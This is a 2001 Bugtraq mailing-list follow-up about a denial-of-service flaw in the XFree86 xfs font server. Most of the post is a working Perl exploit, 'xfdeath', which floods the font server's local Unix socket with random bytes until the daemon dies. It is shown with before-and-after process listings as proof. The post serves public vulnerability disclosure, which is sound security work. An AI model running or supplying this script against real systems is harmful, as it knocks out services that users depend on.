[20961] in bugtraq
Re:XFree86-xfs-4.0.1-1 DoS
daemon@ATHENA.MIT.EDU (Mathias Dybvik)
Mon Jun 11 13:36:45 2001
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Date: Mon, 11 Jun 2001 00:53:16 -0400
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F98EybqfAj81EYtN3Is000056d0@hotmail.com>
I forgot to mention that the TCP attack against the font server is
(obviously) only applicable to font-servers listening to TCP. (Which is
probably only the case for systems serving x-terminals.)
Thanks to people
who pointed this out.
If we want to kill a font-server running on the Mandrake/Redhat/whatever
*default* setup, we have to send the garbage to the Unix-Domain socket
instead.
I've only tested this on Mandrake 8.0, on my system it takes about 5-10
seconds before xfs dies. I appologize if the script is ugly, I'm a PHB, not
a developer, and the few lines below is more perl than I've written all
year.
Mathias
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte,$i,$STOP);
sub darned {
$STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
$STOP=0;
$grab = shift || '/tmp/.font-unix/fs-1';
socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0) || die "socket: $!";
connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
while (!$STOP) {
read(GARBAGE, $garbagebyte, 1);
print ".";
print A_SOCKET $garbagebyte;
}
}
exit;
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
